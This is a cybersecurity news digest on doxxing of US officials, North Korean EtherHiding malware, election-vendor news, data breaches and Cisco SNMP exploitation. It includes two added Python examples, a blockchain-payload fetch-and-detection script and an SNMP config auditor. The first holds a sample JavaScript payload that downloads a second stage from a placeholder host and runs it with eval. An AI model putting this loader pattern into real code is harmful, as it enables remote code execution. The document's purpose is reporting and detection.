The Com members doxxed DHS and ICE workers
DPRK hackers use EtherHiding to turn a public blockchain into a C2 server, former GOP operative buys Dominion Voting Systems to make it "America-owned," DoJ charges voting tech company Smartmatic amid its Fox defamation suit, MI5 points to new Chinese threat disruption, much more


Metacurity is a reader-supported publication that requires significant work and non-trivial expenses. We rely on the generous support of our paid readers. Please consider upgrading your subscription to support Metacurity's ongoing work. Thank you.
If you're unable to commit to a subscription today, please consider donating whatever you can. Thank you!
A group of hackers from the Com, a loose-knit community behind some of the most significant data breaches in recent years, has posted the names and personal information of hundreds of government officials, including people working for the Department of Homeland Security (DHS) and Immigration and Customs Enforcement (ICE).
“I want my MONEY MEXICO,” wrote a user of the Scattered LAPSUS$ Hunters Telegram channel, whose name combines several other hacking group names associated with the Com. The message was referencing a claim from the DHS that Mexican cartels have begun offering thousands of dollars for doxing agents. The US government has not provided any evidence for this claim.
Out of multiple spreadsheets posted on the group's Telegram channel, one contained the alleged personal information of 680 DHS officials; another contained data on more than 170 FBI email addresses and their owners; and the third contained the apparent personal information of more than 190 Department of Justice officials.
Using data collected by cybersecurity company District 4 Labs, 404 Media corroborated some of the data posted to Telegram. It showed that many parts of the dox did relate to government officials with the same name, agency, address, or phone number. In some cases, the addresses posted by the hackers appear to relate to residential addresses rather than offices.
It is not clear how the hackers collated or otherwise sourced this data, be that by combining previous diffuse data breaches or by obtaining it from a government-specific breach.
DHS has repeatedly said that its officers are facing a wave of doxing and physical threats in the second Trump administration. Most recently, the agency said officials “are facing a more than 1000% increase in assaults against them and their families are being doxxed and threatened online.” It is not clear how exactly DHS is quantifying those events to calculate that increase. (Joseph Cox / 404 Media)
Related: r/uspolitics, r/behindthebastards, r/goodnews
Cisco Talos and Google Threat Intelligence Group researchers report that North Korean operatives who dupe job seekers into installing malicious code on their devices have been spotted using new malware strains and techniques, resulting in the theft of credentials or cryptocurrency and ransomware deployment.
Cisco Talos said it observed an attack linked to Famous Chollima that involved the use of BeaverTail and OtterCookie, separate but complementary malware strains frequently used by the North Korea-aligned threat group. Researchers said their analysis determined the extent to which BeaverTail and OtterCookie have merged and displayed new functionality in recent campaigns.
GTIG said it observed UNC5342 using EtherHiding, a technique that stores malicious JavaScript payloads on a public blockchain, turning it into a decentralized command and control server. Researchers said UNC5342 incorporated EtherHiding into a North Korea-aligned social engineering campaign previously dubbed Contagious Interview by Palo Alto Networks.
Cisco and Google both said North Korean threat groups’ use of more specialized and evasive malware underscores the efforts the nation-state attackers are taking to achieve multiple goals while avoiding more common forms of detection.
By storing the payload on a public blockchain rather than on servers it controls, UNC5342 can remotely update the malware’s functionality and maintain continuous control over its operations without worrying about infrastructure takedowns or disruptions. (Matt Kapko / CyberScoop)
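As an added worked example (not code from Google, Cisco Talos or this newsletter), the snippet below shows the mechanics behind that resilience: the read-only JSON-RPC call an EtherHiding-style loader uses to fetch its payload from a contract, the ABI decoding of the returned string, and a heuristic that flags such calls in proxy logs. The contract address, function selector, RPC host list, process allowlist, payload and log lines are all constructed placeholders.

```python
import json
import re

# ABI encoding of a `string` return value: 32-byte offset to the data,
# 32-byte length, then the UTF-8 bytes right-padded to a 32-byte boundary.
def abi_encode_string(text: str) -> str:
    data = text.encode("utf-8")
    pad = (-len(data)) % 32
    return ("0x" + (32).to_bytes(32, "big").hex()
            + len(data).to_bytes(32, "big").hex()
            + (data + b"\x00" * pad).hex())

def abi_decode_string(hexdata: str) -> str:
    raw = bytes.fromhex(hexdata.removeprefix("0x"))
    offset = int.from_bytes(raw[0:32], "big")
    length = int.from_bytes(raw[offset:offset + 32], "big")
    if offset + 32 + length > len(raw):
        raise ValueError("truncated ABI string")
    return raw[offset + 32:offset + 32 + length].decode("utf-8")

CONTRACT = "0x" + "11" * 20   # assumption: placeholder contract address
SELECTOR = "0x" + "aa" * 4    # assumption: placeholder 4-byte function selector

def build_eth_call(contract: str, selector: str) -> dict:
    # eth_call runs the contract's getter locally on the RPC node: no gas and
    # no transaction, so the fetch leaves no on-chain trace. Only the attacker's
    # updates to the stored payload are recorded as transactions.
    return {"jsonrpc": "2.0", "id": 1, "method": "eth_call",
            "params": [{"to": contract, "data": selector}, "latest"]}

# assumption: illustrative public RPC providers and a browser allowlist where
# wallet-extension traffic to those providers is expected
RPC_HOST_RE = re.compile(r"(binance\.org|infura\.io|alchemy\.com|ankr\.com|publicnode\.com)$")
EXPECTED_PROCESSES = {"chrome.exe", "firefox.exe", "msedge.exe"}
SCRIPT_RE = re.compile(r"\b(eval|Function|fetch|XMLHttpRequest|atob|require)\b")

def flag_eth_call(line: str) -> bool:
    """True when a JSON proxy log line is an eth_call to a public RPC
    endpoint from a process that is not a browser."""
    ev = json.loads(line)
    if ev.get("method") != "POST" or not RPC_HOST_RE.search(ev.get("host", "")):
        return False
    try:
        body = json.loads(ev.get("body", ""))
    except json.JSONDecodeError:
        return False
    if not isinstance(body, dict) or body.get("method") != "eth_call":
        return False
    return ev.get("process") not in EXPECTED_PROCESSES

def scan(lines):
    return [i for i, line in enumerate(lines) if flag_eth_call(line)]

def looks_like_script(hexdata: str) -> bool:
    """True when an eth_call result decodes to text that looks like JavaScript
    rather than ordinary contract data."""
    try:
        text = abi_decode_string(hexdata)
    except (ValueError, UnicodeDecodeError):
        return False
    return SCRIPT_RE.search(text) is not None

# constructed sample data
PAYLOAD = 'fetch("https://example.invalid/stage2").then(r => r.text()).then(eval)'
SAMPLE_LOGS = [
    json.dumps({"process": "node.exe", "method": "POST", "host": "bsc-dataseed.binance.org",
                "body": json.dumps(build_eth_call(CONTRACT, SELECTOR))}),
    json.dumps({"process": "chrome.exe", "method": "POST", "host": "bsc-dataseed.binance.org",
                "body": json.dumps(build_eth_call(CONTRACT, SELECTOR))}),
    json.dumps({"process": "node.exe", "method": "GET", "host": "example.invalid", "body": ""}),
]

if __name__ == "__main__":
    print("flagged log lines:", scan(SAMPLE_LOGS))
    print("payload is script:", looks_like_script(abi_encode_string(PAYLOAD)))
```

The first log line (a Node process, which is where Contagious Interview's trojanized packages run, calling a public RPC endpoint) is flagged; the browser's call is not, because wallet extensions legitimately make the same request. Blocking the RPC provider is rarely an option, so the useful signal is the calling process and the fact that the returned "data" decodes to code.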
Related: Google Cloud, Cisco Talos, Coincentral, BeInCrypto, Ars Technica

Former GOP operative Scott Leiendecker just bought Dominion Voting Systems, giving him ownership of voting systems used in 27 states.
He is rebranding Dominion, which has headquarters in Canada and the United States, under the name Liberty Vote “in a bold and historic move to transform and improve election integrity in America” and to distance the company from false allegations made previously by President Donald Trump and his supporters that the company had rigged the 2020 presidential election to give the win to President Joe Biden.
The rebranded company will be 100 percent American-owned, will have a “paper ballot focus” that leverages hand-marked paper ballots, will “prioritize facilitating third-party auditing,” and is “committed to domestic staffing and software development.”
Philip Stark, professor of statistics at UC Berkeley and a longtime election-integrity advocate, says Liberty’s assurance about domestic-only workers is a red herring. “If the claim is that this is somehow a security measure, it isn’t. Because programmers based in the US also … may be interested in undermining or altering election integrity,” he says.
With regard to third-party audits mentioned in the press release, a Liberty official said this means the company will conduct a “third-party, top-to-bottom, independent review of [Dominion] software and equipment in a timely manner and will work closely with federal and state certification agencies and report any vulnerabilities” to give voters assurance in the machines and the results they produce.
The company didn’t say when this review would occur, but a Liberty representative told Axios it would happen ahead of next year's midterm elections, and the company would "rebuild or retire" machines as needed. (Kim Zetter / Wired)
Related: Colorado Public Radio, Colorado Newsline
Federal prosecutors have charged voting technology firm Smartmatic with money laundering and other crimes arising from more than $1 million in bribes that several executives allegedly paid to election officials in the Philippines.
The payments, between 2015 and 2018, were made to obtain a contract with the Philippines government to help run that country’s 2016 presidential election and secure the timely payment for its work, according to a superseding indictment filed in a Florida federal court.
Three former executives of Smartmatic, including co-founder Roger Pinate, were previously charged in 2024, but at the time, South Florida-based Smartmatic was not named as a defendant. Pinate, who no longer works for Smartmatic but remains a shareholder, has pleaded not guilty.
The criminal case is unfolding as Smartmatic is pursuing a $2.7 billion lawsuit accusing Fox News of defamation for airing false claims that the company helped rig the 2020 US presidential election, in which Joe Biden defeated Donald Trump. (Joshua Goodman / Associated Press)
Related: Justice Department, Zero Day, Reuters, The New York Times, The Wall Street Journal, Deadline, Raw Story, Mediaite, Washington Examiner
The head of MI5, the UK’s domestic security service, revealed that its spies had disrupted a new threat from China in recent days, as he expressed frustration over the collapse of an espionage case linked to Beijing.
“We’ve intervened operationally again just in the last week,” MI5 Director-General Ken McCallum told reporters, declining to elaborate on the nature of the activity. “Do Chinese state actors present a UK national security threat? The answer is: Of course, yes, they do — every day.”
Chinese spying in Britain has come under greater scrutiny in the wake of prosecutors’ decision to drop a case against two men accused of trying to gather intelligence about the country’s policy toward Beijing. The Crown Prosecution Service has said it abandoned the case because the government had not met the threshold of designating China as a national security threat.
The suspects have denied the allegations.
Prime Minister Keir Starmer has redirected blame toward the prosecutors and the Conservative government that was in power when the charges were first brought. On Wednesday, he released witness statements by Deputy National Security Adviser Matthew Collins showing that he described the activity in the case as representing an “active espionage threat.” (Alex Wickham / Bloomberg)
Related: BBC News, Reuters, Sky News, The Independent, The Guardian
Hackers stole the personal information of over 17.6 million people after breaching the systems of peer-to-peer lending marketplace Prosper.
As the company disclosed one month ago on a dedicated page, the breach was detected on September 2, but Prosper has yet to find evidence that the attackers gained access to customer accounts and funds.
However, the attackers stole data belonging to Prosper customers and loan applicants. The company hasn't shared what information was exposed beyond Social Security numbers because it's still investigating what data was affected.
Prosper added that the security breach didn't impact its customer-facing operations and that it has reported the incident to relevant authorities and is collaborating with law enforcement to investigate the attack.
While Prosper didn't share how many customers were affected by this data breach, data breach notification service Have I Been Pwned revealed the extent of the incident, reporting that it affected 17.6 million unique email addresses.
According to Have I Been Pwned, the stolen information also includes customers' names, government-issued IDs, employment status, credit status, income levels, dates of birth, physical addresses, IP addresses, and browser user agent details. (Sergiu Gatlan / Bleeping Computer)
Related: Malwarebytes, Infosecurity Magazine, Security Week
For Sweden, an increasingly cashless society where 90% of transactions are digital, the banking sector represents a particular vulnerability in light of the growing adoption of hybrid cyber-physical attacks by Russia.
The central bank has mapped the payment system’s pressure points and has mainly built its plans around two headline scenarios: large-scale cyberattacks and prolonged outages in electricity and data communications.
Cyberattacks don’t have to be the sort of sophisticated breaches or ransomware attacks that have hit companies around the world to create major disruptions.
In April, BankID, a digital authentication service used by millions of Swedes and a significant part of the country’s digital payments system, was subject to a distributed denial-of-service (DDoS) attack, in which assailants try to overwhelm a system with requests, forcing it offline or slowing it down until it’s unusable.
The result was hours of disruption that left Swedes unable to send money through Swish — the mobile payment app used for everything from splitting lunch bills to paying rent — or access online banking and other services tied to BankID. (Evelina Youcefi / Bloomberg)
Related: r/europe
A ransomware attack on MuniOS, a website operated by Ann Arbor, Michigan-based tech company ImageMaster LLC, is disrupting state and local borrowers’ ability to post debt documents on the $4.3 trillion municipal-bond market’s main distribution platform.
MuniOS has been out of service for several days due to the cyber attack, according to people familiar with the matter.
Borrowers use the website to showcase their bond offering documents, and it’s a popular service used by investors and analysts for information about transactions before they are sold. While market participants said they hadn’t seen or experienced any delays in deals, some issuers are shifting long-held practices by turning to alternative platforms such as BondLink due to the disruption.
The MuniOS outage is causing issuers, investors, bankers, and lawyers headaches and inconvenience, but so far, transactions have proceeded normally, according to multiple market participants who spoke on the condition of anonymity. The disruption has prompted some to directly send large-file PDFs between parties the old-fashioned way, while others have seen their days fill up with long phone calls from investors unable to access documents, they say. (Erin Hudson and Amanda Albright / Bloomberg)
Related: Bloomberg Law, The Bond Buyer
The Korean government officially acknowledged that hackers had accessed the Onnara system, a government work management platform, and administrative digital signature certificates called the government public key infrastructure (GPKI), which are essential for civil servant authentication.
Authorities said they are investigating how the breach occurred and assessing the extent of the damage, while also implementing new security measures.
During a press briefing at the government complex in Sejong, the Ministry of the Interior and Safety confirmed that “in mid-July, the National Intelligence Service (NIS) discovered signs that an external party accessed the Onnara system via the Government Virtual Private Network (G-VPN).”
The statement came two months after a report by Phrack Magazine, a US-based cybersecurity publication, claimed that the Ministry of the Interior and Safety, Ministry of Foreign Affairs, Ministry of Unification, Ministry of Oceans and Fisheries, telecom companies KT and LG U+, and private tech firms including Daum, Kakao and Naver, had all been targeted by hackers.
Until now, the Korean government had remained silent, but on Friday, it acknowledged that the report’s claims were accurate. (MOON HEE-CHUL / KoreaJoongAngDaily)
Related: Yonhap News Agency, Chosun Biz, MHN
The number of victims affected by unauthorized connections to illegal base stations not managed by Korean telco giant KT, which led to personal data leaks and unauthorized micro-payments, has turned out to be far greater than initially reported, the telecom company said.
At a press briefing held at its Gwanghwamun headquarters in Jongno District, central Seoul, KT said the number of illegal base station IDs connected to its network has increased from four to 20, and that an additional 2,200 users were found to have connected to them, bringing the total number of affected customers to around 22,200.
The illegal base station connections began on Oct. 8, 2024, and continued for 305 days. The affected areas, initially limited to Seoul and Gyeonggi, have expanded to include Gangwon. KT added that it is still verifying the timeline between when the breach began and when it was first detected.
“There is a possibility that additional illegal base stations exist beyond those already seized,” said Koo Jae-hyung, head of KT’s network technology division. “If further devices are identified through the investigation, we will disclose the findings.”
KT conducted a full-scale review of 150 million payment transactions processed through its network between Aug. 1 and Sept. 10, 2025. Initially, the company only examined transactions authenticated through automated response systems (ARS), but following public criticism, it expanded the review to include SMS and PASS authentication as well. The broader review uncovered 63 additional cases of unauthorized micro-payments made through SMS verification. (JEONG JAE-HONG / KoreaJoongAngDaily)
Related: MHN, Yonhap News Agency
Iran-backed hackers sought to blackmail former US national security advisor John Bolton over emails they had accessed, according to an indictment accusing him of mishandling classified material.
Bolton fell out with President Donald Trump after serving in his first term and has become a strident critic of the populist president.
The indictment, which draws upon investigations that gained pace under the presidency of Joe Biden, accuses Bolton of sending over a thousand pages of so-called diary notes about his duties in 2018 and 2019.
Bolton, prosecutors allege, used his AOL email account and an insecure messaging app to transmit some materials to two unnamed people who lacked security clearances. Those messages, the indictment added, included “national defense information,” including top secret classified material.
On or around July 6, 2021, the indictment alleged, a Bolton representative contacted the FBI, saying, "evidently someone has gotten into Amb. Bolton's personal email account and that it looks as though it is someone in Iran."
The hacker allegedly taunted Bolton, according to an email forwarded to the FBI by the representative, saying, “This could be the biggest scandal since Hillary’s emails were leaked, but this time on the G.O.P side! Contact me before it’s too late," in a reference to the Republican party.
On or around August 5, 2021, the indictment continued, Bolton received another email from the hackers saying, "OK John ... As you want (apparently), we'll disseminate the expurgated sections of your book by reference to your leaked email".
Bolton, prosecutors said, did not inform the FBI that the contents of the hacked emails could have been classified. (Iran International)
Related: Times of Israel, Associated Press
Researchers at Resecurity report that a key to ransomware gang Qilin's success appears to be its "close affiliation" with a network of bulletproof hosting providers with ties to companies in Saint Petersburg, Russia, and Hong Kong that help the group "to discreetly host illicit content and infrastructure beyond the reach of law enforcement."
Qilin's data leak blog has advertised services offered by Bearhost Servers, also known as Underground and Voodoo Servers, and mentioned various services, including Hong Kong-based Cat Technologies, which uses a domain previously tied to malicious activity and connected to St. Petersburg-based Aeza Group.
The US Treasury Department on July 1 described Aeza as a bulletproof hosting service that has provided services to the Meduza and Lumma infostealers, hosting to the BianLian ransomware group and to RedLine infostealer panels, and supported darknet drug markets. Researchers have tied it to the pro-Kremlin influence operation tracked as Doppelgänger.
Bearhost last December began advertising a mass scanning service, as well as new infrastructure onto which they'd move all customers. "Typically, cybercriminals purchase such servers to scan for vulnerable hosts and applications and exploit them at scale," Resecurity said.
Right before the end of the year, Bearhost announced that its service was no longer operating. But Resecurity said this was a ruse, meant to mask the operators taking their service into "private mode," through which they would sell services only to people they already trusted or who passed extensive vetting checks. (Matthew J. Schwartz / Infosecurity Magazine)
Related: Resecurity, Security Affairs, SC Media
Researchers at Trend Micro report that threat actors exploited a recently patched remote code execution vulnerability (CVE-2025-20352) in Cisco networking devices to deploy a rootkit and target unprotected Linux systems.
The flaw leveraged in the attacks affects the Simple Network Management Protocol (SNMP) subsystem of Cisco IOS and IOS XE. An authenticated remote attacker holding a valid SNMP community string or SNMPv3 credentials can crash the device, and one who also holds high-privileged (privilege 15) administrative credentials can execute code as root, which is the RCE path the attackers used.
The attacks exploited the flaw in Cisco 9400, 9300, and legacy 3750G series devices and deployed rootkits on "older Linux systems that do not have endpoint detection response solutions."
In the original bulletin for CVE-2025-20352, updated on October 6, Cisco tagged the vulnerability as exploited as a zero day, with the company's Product Security Incident Response Team (PSIRT) saying it was "aware of successful exploitation."
Trend Micro researchers track the attacks under the name 'Operation Zero Disco' because the malware sets a universal access password that contains the word "disco."
The report from Trend Micro notes that the threat actor also attempted to exploit CVE-2017-3881, an eight-year-old vulnerability in the Cluster Management Protocol code in IOS and IOS XE.
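Patching is the fix, but the exploit still needs to reach SNMP with valid credentials, so the exposure that makes it cheap is an SNMP service open to any source with guessable community strings or read-write access. The added example below (not code from Cisco or Trend Micro) audits a running-config for those conditions and shows a weak configuration beside a restricted one. Both config texts, the hostname, the ACL name and the community string are constructed placeholders.

```python
import re

# constructed sample: the kind of SNMP setup that makes CVE-2025-20352 cheap
WEAK_CONFIG = """\
hostname edge-sw1
snmp-server community public RO
snmp-server community private RW
snmp-server group NETMON v3 noauth
"""

# constructed sample: SNMP reachable only from one management host, read-only,
# with SNMPv3 authentication and encryption required
HARDENED_CONFIG = """\
hostname edge-sw1
ip access-list standard SNMP-MGMT
 permit 10.0.250.10
 deny any log
snmp-server community placeholder-ro-string RO SNMP-MGMT
snmp-server group NETMON v3 priv access SNMP-MGMT
"""

# IOS syntax: snmp-server community <string> [view <name>] [RO|RW] [acl]
COMMUNITY_RE = re.compile(
    r"^snmp-server community (\S+)(?:\s+view\s+\S+)?(?:\s+(RO|RW))?(?:\s+(\S+))?$", re.I)
# IOS syntax: snmp-server group <name> v3 {noauth|auth|priv} ...
V3_GROUP_RE = re.compile(r"^snmp-server group (\S+) v3 (noauth|auth|priv)", re.I)
DEFAULT_COMMUNITIES = {"public", "private"}

def audit_snmp(config: str) -> list:
    """Return a list of findings for SNMP exposure in an IOS-style config."""
    findings = []
    acls = set(re.findall(r"^ip access-list standard (\S+)", config, re.M))
    acls |= set(re.findall(r"^access-list (\d+) ", config, re.M))
    for raw in config.splitlines():
        line = raw.strip()
        m = COMMUNITY_RE.match(line)
        if m:
            name, mode, acl = m.group(1), (m.group(2) or "RO").upper(), m.group(3)
            if name.lower() in DEFAULT_COMMUNITIES:
                findings.append(f"default community string '{name}'")
            if mode == "RW":
                findings.append(f"read-write community '{name}' (SNMP SET allowed)")
            if acl is None:
                findings.append(f"community '{name}' has no ACL: reachable from any source")
            elif acl not in acls:
                findings.append(f"community '{name}' references undefined ACL '{acl}'")
            continue
        m = V3_GROUP_RE.match(line)
        if m and m.group(2).lower() != "priv":
            findings.append(f"SNMPv3 group '{m.group(1)}' uses {m.group(2)}: no encryption")
    return findings

if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit_snmp(cfg) or "no findings")
```

The ACL narrows who can even speak SNMP to the device, read-only communities remove the SET path, and SNMPv3 `priv` keeps credentials off the wire; none of that replaces the patch, but it shrinks the set of hosts from which a device can be reached while the patch is rolled out.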
Related: Trend Micro, Security Affairs

Major international auction house Sotheby’s is notifying individuals of a data breach incident on its systems where threat actors stole sensitive information, including financial details.
The hack was detected on July 24, and the investigation took two months to determine the type of data stolen and the individuals impacted as a result.
According to a filing the organization submitted to Maine’s AG office, the data exposed in the incident includes full names, Social Security numbers (SSNs), and financial account information.
At the time of writing, no ransomware groups have assumed responsibility for the attack at Sotheby’s. (Bill Toulas / Bleeping Computer)
Related: Maine Attorney General, Security Affairs, The Register
Amazon’s surveillance camera maker Ring announced a partnership with Flock, a maker of AI-powered surveillance cameras that share footage with law enforcement.
Now, agencies that use Flock can request that Ring doorbell users share footage to help with “evidence collection and investigative work.”
Flock cameras work by scanning the license plates and other identifying information about cars they see. Flock’s government and police customers can also make natural language searches of their video footage to find people who match specific descriptions. However, AI-powered technology used by law enforcement has been proven to exacerbate racial biases.
On the same day that Ring announced this partnership, 404 Media reported that ICE, the Secret Service, and the Navy had access to Flock’s network of cameras. By partnering with Ring, Flock could potentially access footage from millions more cameras. (Amanda Silberling / TechCrunch and Joseph Cox / 404 Media)
Related: CNBC, Washington Post
Digital rights group the Electronic Frontier Foundation (EFF) filed a lawsuit against the Trump administration over the government’s alleged social media monitoring of people who are lawfully living in the United States.
The suit contends that the government is using AI and other methods to watch the social media posts of virtually every single non-citizen who is in the United States legally and on a valid visa, as well as many people who have obtained permanent resident status. The US government is, according to these allegations, looking for posts that express views that the current government disfavors.
The lawsuit states that the list of forbidden posts includes those that criticize American culture and the US government; those that express antisemitic/pro-Palestine support, including support of university protests on the matter; those that rationalize or make light of Charlie Kirk’s murder; or those that criticize the Trump administration or its actions.
The EFF also alleges that the government is threatening non-citizens with punishments, which include revoking their visas or immigration confinement.
The lawsuit points to posts on the State Department’s X account. This includes the currently pinned thread documenting the visas that the department revoked over comments about Charlie Kirk. (Julie Bort / TechCrunch)

The Dairy Farmers of America said cybercriminals breached company systems in June, gaining access to the information of employees and members of the cooperative.
The organization previously confirmed to the outlet Dairy Herd Management in June that multiple manufacturing plants within its network were dealing with a ransomware attack. A notorious ransomware gang took credit for the incident days after the statement was released.
The organization filed breach notifications with regulators in Maine, explaining that the personal information of 4,546 people was exposed during the attack. The information stolen includes names, Social Security numbers, driver's license or state-issued ID numbers, dates of birth, bank account numbers, and Medicare or Medicaid numbers. (Jonathan Greig / The Record)
Related: Maine Attorney General
In a departure from the trend of AI chatbots and machine learning being baked into the web browser, Tor Browser 15.0a4, which is the latest alpha release, is available now, and one of the biggest changes is that it removes various AI features that Mozilla has been integrating into Firefox.
The Tor team is taking a firm stance, stating that these machine learning systems are inherently un-auditable from a security and privacy standpoint. Essentially, they don't want to include anything that could compromise your privacy or imply an endorsement of these systems. (Jorge A. Aguilar / HowToGeek)
Related: Tor Blog, Hacker News (ycombinator)
Best Thing of the Day: She Should Take Them for Everything They've Got
A New Jersey teenage girl whose real photo was allegedly transformed by a classmate into at least one fake-nude image is suing AI/Robotics Venture Strategy 3 Ltd, the developer of the “clothes removal” software that was used.
Worst Thing of the Day: Does Musk Do Anything Good for Humanity?
An AFP investigation shows scam centers in Myanmar, blamed for swindling billions from victims across the globe, are expanding just months after a crackdown that was supposed to eradicate them, thanks in part to their wide-scale access to Elon Musk's Starlink internet service.
Closing Thought
